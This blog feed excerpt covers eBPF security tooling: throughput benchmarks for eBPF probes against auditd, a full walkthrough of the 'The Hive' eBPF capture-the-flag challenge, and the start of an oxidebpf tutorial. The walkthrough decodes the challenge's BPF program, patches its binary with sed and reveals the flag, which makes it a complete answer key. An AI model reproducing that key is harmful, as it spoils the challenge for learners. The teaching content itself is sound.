(CO-RE). Unfortunately, for a variety of legitimate reasons, customers aren’t
always running newer kernels.</p>
<p>To tackle this problem, we’re building a system called the Linux Kernel
Component Cloud Builder (LKCCB). LKCCB is an automated system that determines
structure offsets for every kernel version and distribution we want to run our
BPF probes on. These kernel offsets will then be dynamically loaded into the
probes at runtime (using <code class="language-plaintext highlighter-rouge">oxidebpf</code>’s BPF hashmap interface). The probes will
be able to check the loaded offsets and use them to navigate through kernel
data structures appropriate for their host environment, returning exactly the
information we’re looking for.</p>
<p>Think of it as a GPS for the Linux kernel. Our probes will be able to rely on
it to find their way, without needing to memorize the lay of the land (i.e.,
compile on the host). Look out for its open source release in 2022!</p>
<h2 id="what-kind-of-results-should-i-expect">What kind of results should I expect?</h2>
<h3 id="more-system-throughput">More system throughput</h3>
<p>We benchmarked our eBPF probes in <code class="language-plaintext highlighter-rouge">redcanary-ebpf-sensor</code> against <code class="language-plaintext highlighter-rouge">auditd</code> by
loading them with <code class="language-plaintext highlighter-rouge">oxidebpf</code> and comparing execl-per-second throughput using
<code class="language-plaintext highlighter-rouge">byte-unixbench</code>. The test systems were four-core virtual machines
with 2GB of RAM each, running on a 3950X host with 64GB of RAM. The baseline VM had
a throughput of <code class="language-plaintext highlighter-rouge">19421.4 execl/s</code>. With <code class="language-plaintext highlighter-rouge">auditd</code> set to trace <code class="language-plaintext highlighter-rouge">execve</code> and
<code class="language-plaintext highlighter-rouge">execveat</code> events, we measured a throughput of <code class="language-plaintext highlighter-rouge">14187.4 execl/s</code>. The
equivalent set of eBPF probes from our sensor ran with a throughput of <code class="language-plaintext highlighter-rouge">16273.1
execl/s</code>. That’s approximately a 15 percent increase in total system throughput over <code class="language-plaintext highlighter-rouge">auditd</code>,
just for exec tracing. If we include the full <code class="language-plaintext highlighter-rouge">auditd</code> configuration required for
our Linux sensor, the system throughput drops to <code class="language-plaintext highlighter-rouge">11989 execl/s</code>. The equivalent
set of eBPF probes from our sensor gets us a throughput of <code class="language-plaintext highlighter-rouge">14254 execl/s</code>,
approximately a 19 percent increase in throughput.</p>
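<p>To spell out the arithmetic, both percentages compare the eBPF result against
the <code class="language-plaintext highlighter-rouge">auditd</code> result from the same configuration:
<code class="language-plaintext highlighter-rouge">16273.1 / 14187.4 ≈ 1.147</code> for exec tracing alone, and
<code class="language-plaintext highlighter-rouge">14254 / 11989 ≈ 1.189</code> for the full configuration. Measured against the
untraced baseline instead, exec tracing costs roughly 27 percent of throughput
with <code class="language-plaintext highlighter-rouge">auditd</code> (<code class="language-plaintext highlighter-rouge">1 - 14187.4 / 19421.4 ≈ 0.269</code>) and roughly 16 percent
with eBPF (<code class="language-plaintext highlighter-rouge">1 - 16273.1 / 19421.4 ≈ 0.162</code>).</p>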
<h3 id="collect-information-directly-from-the-kernel">Collect information directly from the kernel</h3>
<p>On some Linux kernel versions, we’ve experienced AuditD reporting incorrect
inode numbers for containerized (i.e., <code class="language-plaintext highlighter-rouge">namespaced</code>) processes. AuditD
notoriously struggles with containers, likely due to the subsystem predating
the popularization of container technology. This requires a userspace
workaround in which we query <code class="language-plaintext highlighter-rouge">procfs</code> for the information we miss. When AuditD
is auditing process forks (i.e., <code class="language-plaintext highlighter-rouge">clone</code>, <code class="language-plaintext highlighter-rouge">clone3</code>, <code class="language-plaintext highlighter-rouge">fork</code>, <code class="language-plaintext highlighter-rouge">vfork</code>) it returns
the child PID as-is from the system call’s return value. The PID returned is in
the PID namespace of the child, and not the root PID namespace. This makes it
very difficult to use AuditD to keep track of process lineage in containerized
environments. With eBPF, however, we can instrument a point in the kernel
that’s on the return path from a process fork to the child process, and inspect
the child process’s current <code class="language-plaintext highlighter-rouge">task_struct</code> to get the true root namespace PID.</p>
<p>By switching to BPF, we can collect inode information directly from the kernel.
If there are kernel version-specific bugs, we can mitigate them by modifying or
creating a new probe. The checks can happen in kernel space, avoiding the
relatively slow and expensive check against procfs, as well as the inherent
race conditions stemming from gathering data in multiple locations
asynchronously.</p>
<h2 id="how-do-i-get-started">How do I get started?</h2>
<p>You can find all of our eBPF for security tools on GitHub:</p>
<ul>
<li><a href="https://github.com/redcanaryco/redcanary-ebpf-sensor">redcanary-ebpf-sensor</a></li>
<li><a href="https://github.com/redcanaryco/oxidebpf">oxidebpf</a></li>
</ul>
<p>As always, we welcome and encourage you to contribute!</p>Friday OrtizThis post was written for Red Canary and originally appeared on their site here.Learning eBPF through gamification: The Hive CTF Challenge and Walkthrough2021-12-02T00:00:00+00:002021-12-02T00:00:00+00:00https://ortiz.sh/bpf/2021/12/02/THE-HIVE<p><strong>TL;DR:</strong> A (relatively) simple eBPF capture the flag challenge and writeup. The
challenge was made by a colleague on the R&D team and the writeup by one of our
detection engineers. The writeup goes through the whole discovery process and is
a great way to dive into BPF.</p>
<h2 id="welcome-to-the-hive">Welcome to the Hive</h2>
<p>A few weeks ago the R&D team at Red Canary created an internal CTF open to anyone
interested. The Hive (<a href="/download/thehive">download here</a>) is a
challenge created by one of our staff engineers, Dave, who as far as I can tell
does not want to be found on the Internet. The goal of the challenge was to
introduce participants to the workings of BPF, in the hopes that the
discovery/trial-and-error process of solving the challenge would give them a
solid foundation in the technology. It turned out more successful than we hoped!</p>
<p>If you’d like to give the challenge a go, click that download link above and try
to find the flag. You’ll need a relatively up-to-date Linux machine (we used
Ubuntu 20.04, but it should work on a bunch of distros) with root credentials.</p>
<p>With that out of the way, below is a writeup by Del, one of our detection
engineers. He did a great job documenting his path from knowing nothing about
BPF to knowing something about BPF. If you get stuck, you can follow along
below. Spoilers from here on out!</p>
<p><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></p>
<h2 id="the-writeup">The Writeup</h2>
<p><br />
<br />
<br />
<br />
<br /></p>
<p><strong>Keep scrolling.</strong></p>
<p><br />
<br />
<br />
<br />
<br /></p>
<h3 id="reverse-engineering-thehive-didnt-work-out-for-me"><em>Reverse Engineering <code class="language-plaintext highlighter-rouge">thehive</code> didn’t work out for me.</em></h3>
<p>Using Ghidra to disassemble and decompile <code class="language-plaintext highlighter-rouge">thehive</code> was frustrating. It seems
that Rust, which is what <code class="language-plaintext highlighter-rouge">thehive</code> was written in, does not produce code that
Ghidra deals well with. This was further complicated by the fact that <code class="language-plaintext highlighter-rouge">thehive</code>
uses the <a href="https://github.com/redcanaryco/oxidebpf">oxidebpf library</a>, which
added another layer that needed to be understood. I had a similar experience
trying to use edb to debug the program while it was running. The only useful
information I extracted was that <code class="language-plaintext highlighter-rouge">thehive</code> doesn’t seem to pay
attention to, or collect, user input.</p>
<p>In retrospect, when you think about the nature of BPF, it makes sense that
Ghidra and edb would only have visibility into the ‘loader’ program, and the
guts of this challenge likely reside in the BPF program that it loads into the
kernel.</p>
<h3 id="reverse-engineering-the-bpf-program-didnt-work-out-for-me"><em>Reverse Engineering the BPF program didn’t work out for me.</em></h3>
<p>BPF programs run in a virtual machine hosted in the Linux kernel. They are
loaded by a regular program which uses system calls that will verify and load
the BPF program. BPF programs can read and write in-memory data structures
called ‘maps’. These ‘maps’ are the primary mechanism for a BPF program to
communicate results to user space.</p>
<p>Although there are other interesting tools, it seems that two tools are most
often mentioned as useful for investigating BPF programs: bpftool and bpftrace.
The version of the kernel running has an impact on what information is available
to these tools. BPF is an evolving capability and new capabilities are being
added on a regular basis.</p>
<p>Roughly speaking, bpftool is a great tool for collecting data about, and
manipulating, BPF programs after they’ve been loaded into the kernel. The
bpftrace tool is great for loading and running BPF programs in a simple way from
the command line (e.g. running one-line BPF programs).</p>
<p>Using bpftool, I was able to discover the BPF program that was being loaded by
<code class="language-plaintext highlighter-rouge">thehive</code>.</p>
<p>Running the command <code class="language-plaintext highlighter-rouge">sudo bpftool prog list</code> listed info about all the loaded
BPF programs, including:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>57: kprobe tag a01e72fbd4579d51 gpl
loaded_at 2021-11-26T18:23:56-0700 uid 0
xlated 368B jited 203B memlock 4096B map_ids 1
pids thehive(2714)
</code></pre></div></div>
<p>One of the other capabilities of bpftool is to list a BPF program in the native
instruction set used by the BPF virtual-machine. Using this capability, once I
discovered the BPF program loaded by <code class="language-plaintext highlighter-rouge">thehive</code>, I was able to examine the code it
compiled to.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo bpftool prog dump xlated id 57
0: (85) call bpf_get_current_pid_tgid#135712
1: (63) *(u32 *)(r10 -4) = r0
2: (18) r1 = 0x5b5548405d585451
4: (7b) *(u64 *)(r10 -80) = r1
5: (b7) r1 = 0
6: (7b) *(u64 *)(r10 -24) = r1
7: (7b) *(u64 *)(r10 -32) = r1
8: (7b) *(u64 *)(r10 -40) = r1
9: (b7) r1 = 42
10: (7b) *(u64 *)(r10 -48) = r1
11: (18) r1 = 0x313b3d3736242010
13: (7b) *(u64 *)(r10 -56) = r1
14: (18) r1 = 0x2b25381424201734
16: (7b) *(u64 *)(r10 -64) = r1
17: (18) r1 = 0x2f1a222c2d333060
19: (7b) *(u64 *)(r10 -72) = r1
20: (b7) r1 = 102
21: (73) *(u8 *)(r10 -80) = r1
22: (b7) r1 = 1
23: (b7) r2 = 1
24: (bf) r3 = r10
25: (07) r3 += -80
26: (0f) r3 += r2
27: (71) r4 = *(u8 *)(r3 +0)
28: (bf) r5 = r1
29: (07) r5 += 55
30: (af) r4 ^= r5
31: (73) *(u8 *)(r3 +0) = r4
32: (07) r1 += 1
33: (07) r2 += 1
34: (15) if r2 == 0x40 goto pc+1
35: (05) goto pc-12
36: (bf) r2 = r10
37: (07) r2 += -4
38: (bf) r3 = r10
39: (07) r3 += -80
40: (18) r1 = map[id:1]
42: (b7) r4 = 0
43: (85) call htab_map_update_elem#160336
44: (b7) r0 = 0
45: (95) exit
</code></pre></div></div>
<p>I’ll spare you the details, but I spent a lot of time trying to reverse engineer
this program. Basically: instructions 0 - 23 load seemingly gibberish values into
memory and set up the loop counters, and instructions 24 - 35 loop through those
values in memory, XOR’ing each byte with a different value. Finally, the rest of
the program writes the resulting values into a map. It seems clear that the XOR
loop is decoding the values before they are written to the map.</p>
<p>Sadly, I was unable to decode the strings using this code. I’m sure it’s
possible, but my binary foo wasn’t up to the job. Once I started asking myself
if endianness mattered, and did I really understand how bytes were being stored
by the vm, I threw up my hands and decided there had to be an easier way.</p>
<p>I did, however, come to understand what this program does, and that it writes a
value to a map. This value is almost certainly the flag!</p>
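<p>For anyone who wants to finish the static approach, the decode loop can be replayed
outside the kernel. What follows is a minimal Rust sketch, not part of the original
challenge: it assumes a little-endian machine (so each 64-bit immediate is laid out
low byte first on the BPF stack), and the function name <code class="language-plaintext highlighter-rouge">decode_hive_buffer</code> is
made up for illustration. The immediates and offsets are copied from the dump above.</p>

```rust
/// Rebuilds the 64-byte stack buffer at r10-80 from the immediates in the
/// xlated dump, then replays the XOR loop from instructions 22-35.
/// Assumption: little-endian byte order for the 64-bit stores.
fn decode_hive_buffer() -> [u8; 64] {
    let mut buf = [0u8; 64];

    // (offset from r10-80, 64-bit immediate stored at that offset)
    let stores: [(usize, u64); 5] = [
        (0, 0x5b5548405d585451),  // *(u64 *)(r10 -80)
        (8, 0x2f1a222c2d333060),  // *(u64 *)(r10 -72)
        (16, 0x2b25381424201734), // *(u64 *)(r10 -64)
        (24, 0x313b3d3736242010), // *(u64 *)(r10 -56)
        (32, 42),                 // *(u64 *)(r10 -48)
    ];
    for &(offset, imm) in stores.iter() {
        buf[offset..offset + 8].copy_from_slice(&imm.to_le_bytes());
    }
    // Offsets 40..64 (r10-40 through r10-17) stay zero, as in instructions 5-8.

    // Instructions 20-21 overwrite the first byte with 102.
    buf[0] = 102;

    // r1 and r2 both start at 1 and advance together, so byte i is XORed
    // with the low byte of (i + 55). The loop exits when r2 reaches 0x40.
    for i in 1..64usize {
        buf[i] ^= (i as u8).wrapping_add(55);
    }
    buf
}

fn main() {
    let buf = decode_hive_buffer();
    // Print everything up to and including the first closing brace, if any.
    let end = buf
        .iter()
        .position(|&b| b == b'}')
        .map_or(buf.len(), |p| p + 1);
    println!("{}", String::from_utf8_lossy(&buf[..end]));
}
```

<p>Note that byte 0 is never touched by the loop, which is why the program patches it
separately. The full 64-byte result can be compared against whatever ends up in the
map.</p>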
<h3 id="letting-the-bpf-program-do-all-the-work-did-work-out-eventually"><em>Letting the BPF program do all the work did work out (eventually)</em></h3>
<p>One of the capabilities of bpftool is the ability to dump the contents of a map.
Unfortunately, when I ran <code class="language-plaintext highlighter-rouge">thehive</code>, although it loaded the BPF program into the
kernel, it appears that the BPF program never runs. I say this because the
associated map never collects a value:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo bpftool map dump id 1
Found 0 elements
</code></pre></div></div>
<p>Looking at the data from <code class="language-plaintext highlighter-rouge">bpftool prog list</code> for the BPF program, we know that the
BPF program is attached to a specific kernel function via the kprobe capability
in BPF. This means that when that particular kernel function executes, the BPF
program attached to it will also be executed. So, it appears that when the
correct kernel function gets invoked, this BPF program will run (and write the
flag to the map associated with it).</p>
<p>So which kernel function is this BPF program attached to? There are literally
thousands of possibilities:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo bpftrace -l | grep kprobe: | wc
51256 51256 1416114
</code></pre></div></div>
<p>(BTW, one of the complications with kprobes is that the set of available kernel
functions varies with the kernel. Since at this point I expected the
BPF program to be attached to something that is often used (such as execve), I
started to worry that maybe I was running a kernel that didn’t support the
kprobe that thehive tried to attach the BPF program to. This led to building
several VMs, each running the most current version of the kernel I could find.
All to no avail.)</p>
<p>Luckily, I eventually discovered that one of the other capabilities of bpftool
is to list any installed kprobes.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo bpftool perf list
pid 2714 fd 6: prog_id 57 kprobe func do_mount offset 0
</code></pre></div></div>
<p>Eureka! This reveals that the BPF program has been attached to the <code class="language-plaintext highlighter-rouge">do_mount</code> kernel
function. So, if I can arrange for that kernel function to be invoked, the BPF
program should execute and write the flag to the map. Even better, this
function sounds like it must be available everywhere.</p>
<p>Well, much hilarity ensued as I tried every way I could think of to use the
mount command to invoke the <code class="language-plaintext highlighter-rouge">do_mount</code> kernel function. The bottom line is that I
mounted ISOs, devices, anything I could think of, all to no effect.</p>
<p>As a sanity check, I ran the following bpftrace program to monitor for <code class="language-plaintext highlighter-rouge">do_mount</code>
invocations:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo bpftrace -e 'kprobe:do_mount { printf("mount by %d\n", tid); }'
</code></pre></div></div>
<p>which confirmed that I was not successfully triggering the <code class="language-plaintext highlighter-rouge">do_mount</code> kernel
function.</p>
<p>Searching the list of kprobes (<code class="language-plaintext highlighter-rouge">bpftrace -l</code>) shows that <code class="language-plaintext highlighter-rouge">do_mount</code> is a legitimate
kprobe target, but I just wasn’t able to trigger it on several different kernels
that I tried. Researching <code class="language-plaintext highlighter-rouge">do_mount</code> didn’t provide a definitive answer, although
there was some suggestion that it’s only used during boot.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Author's note: what follows should not be necessary to get the solution. In our
own testing we were successful with running the standard mount command. The
command doesn't even need to succeed, so long as do_mount is invoked at some
point. But, honestly, Del's solution here is pretty darn clever.
</code></pre></div></div>
<h3 id="so-here-i-resorted-to-using-a-blunt-instrument"><em>So here I resorted to using a blunt instrument</em></h3>
<p>Finally, in desperation, I decided to try patching the program to change which
kernel function this BPF program was attached to. A quick search
using the strings program against the binary suggested that the name of the
function was in fact stored in the binary and used when attaching the BPF program.</p>
<p>Using the ghex binary file editor I manually changed the instances of <code class="language-plaintext highlighter-rouge">do_mount</code>
to <code class="language-plaintext highlighter-rouge">execve</code>, since I knew that the <code class="language-plaintext highlighter-rouge">execve</code> kernel function was being invoked often.
I null terminated this string, since the <code class="language-plaintext highlighter-rouge">do_mount</code> strings appeared to be null
terminated (in Rust, strings aren’t necessarily null terminated). However, the
patched binary panicked when I tried it.</p>
<p>On the theory that the strings were not null terminated, I searched the list of
kprobe names for one the same length as <code class="language-plaintext highlighter-rouge">do_mount</code>, and decided to try replacing
<code class="language-plaintext highlighter-rouge">do_mount</code> with <code class="language-plaintext highlighter-rouge">do_rmdir</code>.</p>
<p>With this change, the patched binary ran successfully. After starting my hacked
version of thehive as root, I executed the commands:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ mkdir test
$ rmdir test
$ sudo bpftool prog list   # to obtain the id of the map
$ sudo bpftool map dump id 7
key:
ad 1a 00 00
value:
66 6c 61 67 7b 74 68 65 5f 70 72 6f 6f 66 5f 69
73 5f 69 6e 5f 74 68 65 5f 70 75 64 64 69 6e 67
7d 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66
67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76
Found 1 element
</code></pre></div></div>
<p>Copying the hex strings above into CyberChef, and then running the ‘From Hex’
recipe with ‘Delimiter’ set to Auto, revealed the flag!</p>
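<p>If CyberChef isn’t handy, the same ‘From Hex’ step is only a few lines of code. Here is
a small Rust sketch; the helper name <code class="language-plaintext highlighter-rouge">parse_hex_bytes</code> is hypothetical, and the input is
assumed to be space-separated hex bytes in the style of the <code class="language-plaintext highlighter-rouge">value:</code> rows above.</p>

```rust
use std::num::ParseIntError;

/// Parses whitespace-separated hex bytes (e.g. "66 6c 61") into raw bytes.
fn parse_hex_bytes(dump: &str) -> Result<Vec<u8>, ParseIntError> {
    dump.split_whitespace()
        .map(|tok| u8::from_str_radix(tok, 16))
        .collect()
}

fn main() {
    // The first 33 bytes of the `value:` field from the map dump.
    let value = "66 6c 61 67 7b 74 68 65 5f 70 72 6f 6f 66 5f 69 \
                 73 5f 69 6e 5f 74 68 65 5f 70 75 64 64 69 6e 67 \
                 7d";
    match parse_hex_bytes(value) {
        // Lossy conversion keeps the program from failing on non-UTF-8 bytes.
        Ok(bytes) => println!("{}", String::from_utf8_lossy(&bytes)),
        Err(err) => eprintln!("not valid hex: {}", err),
    }
}
```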
<p>For me, this was a deep immersion in modern BPF, something I had only
fleetingly played with before. Overall it was a complete blast, and I’m
grateful for the opportunity to play with it. I’d certainly appreciate any
corrections or suggestions on better ways to approach this challenge.</p>
<h3 id="here-are-some-references">Here are Some References:</h3>
<ul>
<li><a href="https://qmonnet.github.io/whirl-offload/2021/09/23/bpftool-features-thread/">https://qmonnet.github.io/whirl-offload/2021/09/23/bpftool-features-thread/</a></li>
<li><a href="https://github.com/iovisor/bpftrace/blob/master/docs/reference_guide.md#bpftrace-reference-guide">https://github.com/iovisor/bpftrace/blob/master/docs/reference_guide.md#bpftrace-reference-guide</a></li>
<li><a href="https://www.kernel.org/doc/Documentation/kprobes.txt">https://www.kernel.org/doc/Documentation/kprobes.txt</a></li>
<li><a href="https://ebpf.io/">https://ebpf.io/</a></li>
<li><a href="https://www.oreilly.com/library/view/linux-observability-with/9781492050193/">https://www.oreilly.com/library/view/linux-observability-with/9781492050193/</a></li>
</ul>
<h3 id="heres-how-to-reproduce-the-solution">Here’s How to Reproduce the Solution</h3>
<ol>
<li><code class="language-plaintext highlighter-rouge">sed s/do_mount/do_rmdir/g thehive > thehive-hacked</code></li>
<li><code class="language-plaintext highlighter-rouge">chmod 755 thehive-hacked</code></li>
<li><code class="language-plaintext highlighter-rouge">sudo ./thehive-hacked</code></li>
<li>open another terminal tab, do the rest in that tab</li>
<li><code class="language-plaintext highlighter-rouge">mkdir test</code></li>
<li><code class="language-plaintext highlighter-rouge">rmdir test</code></li>
<li><code class="language-plaintext highlighter-rouge">sudo bpftool prog list</code></li>
<li>near end, find ‘kprobe’ with ‘loaded_at’ or ‘pids’ matching step 3, observe ‘map_ids’</li>
<li><code class="language-plaintext highlighter-rouge">sudo bpftool map dump id <id# from 'map_ids' in step 8></code></li>
<li>copy & paste ‘value:’ into a CyberChef window</li>
<li>use the ‘From Hex’ recipe with ‘Delimiter’ set to Auto</li>
</ol>
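<p>The substitution in step 1 only works because both names are the same length, so
nothing else in the binary shifts. As a rough illustration of that constraint, here is a
Rust sketch of a same-length, in-place byte replacement. The function name
<code class="language-plaintext highlighter-rouge">patch_same_length</code> is made up for this example, and the demo runs on an in-memory
buffer rather than the real binary.</p>

```rust
/// Replaces every occurrence of `from` with `to` inside `data`, in place.
/// Both patterns must have the same length so that no offsets move.
/// Returns the number of replacements made.
fn patch_same_length(data: &mut [u8], from: &[u8], to: &[u8]) -> usize {
    assert_eq!(from.len(), to.len(), "patterns must be the same length");
    if from.is_empty() {
        return 0;
    }
    let mut count = 0;
    let mut i = 0;
    while i + from.len() <= data.len() {
        if &data[i..i + from.len()] == from {
            data[i..i + from.len()].copy_from_slice(to);
            count += 1;
            i += from.len(); // skip past the bytes we just rewrote
        } else {
            i += 1;
        }
    }
    count
}

fn main() {
    // Stand-in for the binary's contents; a real run would load the file
    // with std::fs::read and save the result with std::fs::write.
    let mut data = b"\x00kprobe\x00do_mount\x00".to_vec();
    let patched = patch_same_length(&mut data, b"do_mount", b"do_rmdir");
    println!("patched {} occurrence(s)", patched);
}
```

<p>A shorter name such as <code class="language-plaintext highlighter-rouge">execve</code> would trip the length check here, which mirrors
the trouble described in the writeup.</p>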
<h3 id="control-flow-graph">Control Flow Graph</h3>
<p>Finally, in case it’s of interest, here’s a flow chart of the BPF program,
courtesy of <code class="language-plaintext highlighter-rouge">bpftool prog dump xlated id <id> visual</code>:</p>
<p><img src="/images/thehive.png" alt="control flow graph of the hive's BPF program" /></p>Friday OrtizTL;DR: A (relatively) simple eBPF capture the flag challenge and writeup. The challenge was made by a colleague on the R&D team and the writeup by one of our detection engineers. The writeup goes through the whole discovery process and is a great way to dive into BPF.Introducing oxidebpf: an open source Linux tool for Rust and eBPF developers2021-11-01T05:00:00+00:002021-11-01T05:00:00+00:00https://ortiz.sh/ebpf/2021/11/01/INTRODUCING-OXIDEBPF<p><strong>This post was written for Red Canary and originally appeared on their site
<a href="https://redcanary.com/blog/oxidebpf/">here</a>.</strong></p>
<p><strong>Author’s Note: This was originally written for an old version of <code class="language-plaintext highlighter-rouge">oxidebpf</code>
(0.1.0, the initial release).</strong></p>
<p>BPF is a <a href="https://redcanary.com/blog/linux-101/">Linux kernel</a> subsystem that
allows a user to run a limited set of instructions on a virtual machine running
in the kernel. It is divided between classic BPF (cBPF) and extended BPF (eBPF,
or simply BPF). The older cBPF was limited to observing packet information,
while the newer eBPF is much more powerful, allowing a user to do things such
as modify packets, change syscall arguments, modify userspace applications, and
more.</p>
<h2 id="why-did-we-create-oxidebpf">Why did we create <code class="language-plaintext highlighter-rouge">oxidebpf</code>?</h2>
<p>We wanted to create a fully BSD-3 licensed library to allow users maximum
flexibility in how they manage BPF programs. There are already a number of
fantastic libraries for interfacing with eBPF. However, none of them met our
exact use case, and licensing was a major hurdle.</p>
<p>eBPF has a wide range of capabilities that can be leveraged for security
applications, but it has evolved significantly over a range of major kernel
versions. This has made it difficult to release commercial products wherein a
customer isn’t responsible for building and deploying the eBPF component
themselves. Customers don’t want to do that, nor do they want to be on the
bleeding edge of the Linux kernel (perhaps they rely on a driver that hasn’t
been updated yet, or they simply use whatever kernel their distro of choice
provides and don’t actively think about it).</p>
<p>One of the major features we implemented in oxidebpf is the ability to compose
arbitrary eBPF programs independently from the file they’re compiled in. This
leaves behind the all-or-nothing approach of many other libraries and allows
the consuming application more flexibility to define what an eBPF program
actually is: a series of functions and maps, independent of the container
format they are stored in.</p>
<p>We want oxidebpf to be as easy as possible for the end user. You import the
library, give it a built eBPF program, tell it what you want to load and how,
and you’re done.</p>
<h2 id="how-do-i-get-started">How do I get started?</h2>
<p><strong>Author’s note: This should work on 0.1, but the interface is somewhat
different from 0.2 onwards. See the talk linked at the beginning of this
post.</strong></p>
<p>oxidebpf assumes you already have a compiled eBPF program ready to load. We
have a minimal example of an eBPF program included under
<a href="https://github.com/redcanaryco/oxidebpf/blob/main/test/test_program.c">test/test_program.c</a>.
We’ve also included a
<a href="https://github.com/redcanaryco/oxidebpf/blob/main/test/Makefile">Makefile</a>,
<a href="https://github.com/redcanaryco/oxidebpf/blob/main/test/Dockerfile">Dockerfile</a>,
and
<a href="https://github.com/redcanaryco/oxidebpf/blob/main/test/docker-compose.yml">YAML</a>
file for easily setting up an environment to build eBPF programs.</p>
<p>Please note that this example is marked with a <code class="language-plaintext highlighter-rouge">Proprietary</code> license, which means
it can’t do anything useful. All the helper functions and exported symbols
you’ll want to use to do meaningful work are exported as GPL-only. You’ll want
to use something GPL-compatible in practice. Our approach has been to release a
generic BPF sensor program under GPL-2.0 that our customers can selectively
load into our proprietary software. Because oxidebpf is BSD-3-licensed, it
gives you the freedom to adopt this approach and develop a fully GPL-compatible
licensed tool (or use any other licensing you choose, so long as the BPF
licensing is respected).</p>
<p>We will assume your project has the following structure, where the contents of
the <code class="language-plaintext highlighter-rouge">bpf/</code> directory are copied from the <code class="language-plaintext highlighter-rouge">test/</code> directory of oxidebpf:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.
├── Cargo.toml
├── bpf
│ ├── Dockerfile
│ ├── Makefile
│ ├── docker-compose.yml
│ └── test_program.c
└── src
└── main.rs
</code></pre></div></div>
<p>Let’s say we want to trace the process identifier (PID) of any process that
receives a TCP message from <code class="language-plaintext highlighter-rouge">tcp_recvmsg</code>. We’ll want to make some modifications
to <code class="language-plaintext highlighter-rouge">test_program.c</code>.</p>
<p>First, we’ll remove all the unnecessary maps and probes and add prototypes for
the functions and structure we actually use.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <linux/kconfig.h>
#include <linux/bpf.h>
</span>
<span class="k">static</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span> <span class="p">(</span><span class="o">*</span><span class="n">bpf_get_current_pid_tgid</span><span class="p">)(</span><span class="kt">void</span><span class="p">)</span> <span class="o">=</span>
<span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mi">14</span><span class="p">;</span>
<span class="k">static</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span> <span class="p">(</span><span class="o">*</span><span class="n">bpf_get_current_uid_gid</span><span class="p">)(</span><span class="kt">void</span><span class="p">)</span> <span class="o">=</span>
<span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mi">15</span><span class="p">;</span>
<span class="k">static</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">bpf_perf_event_output</span><span class="p">)(</span><span class="kt">void</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">map</span><span class="p">,</span> <span class="kt">int</span> <span class="n">index</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">int</span> <span class="n">size</span><span class="p">)</span> <span class="o">=</span>
<span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mi">25</span><span class="p">;</span>
<span class="k">static</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span> <span class="p">(</span><span class="o">*</span><span class="n">bpf_get_smp_processor_id</span><span class="p">)(</span><span class="kt">void</span><span class="p">)</span> <span class="o">=</span>
<span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mi">8</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">bpf_map_def</span> <span class="p">{</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">type</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">key_size</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">value_size</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">max_entries</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">map_flags</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Then, we’ll add a new <code class="language-plaintext highlighter-rouge">BPF_MAP_TYPE_PERF_EVENT_ARRAY</code> for communicating PIDs
back to our program.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">bpf_map_def</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">section</span><span class="p">(</span><span class="s">"maps/pid_events"</span><span class="p">),</span> <span class="n">used</span><span class="p">))</span> <span class="n">pid_events</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">.</span><span class="n">type</span> <span class="o">=</span> <span class="n">BPF_MAP_TYPE_PERF_EVENT_ARRAY</span><span class="p">,</span>
<span class="p">.</span><span class="n">key_size</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">u32</span><span class="p">),</span>
<span class="p">.</span><span class="n">value_size</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">u32</span><span class="p">),</span>
<span class="p">.</span><span class="n">max_entries</span> <span class="o">=</span> <span class="mi">1024</span><span class="p">,</span>
<span class="p">.</span><span class="n">map_flags</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Then we’ll want to create a struct for passing the PID back to our program
through the <code class="language-plaintext highlighter-rouge">perf</code> map.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">typedef</span> <span class="k">struct</span> <span class="p">{</span>
<span class="n">u32</span> <span class="n">pid</span><span class="p">;</span>
<span class="n">u32</span> <span class="n">tgid</span><span class="p">;</span>
<span class="n">u32</span> <span class="n">uid</span><span class="p">;</span>
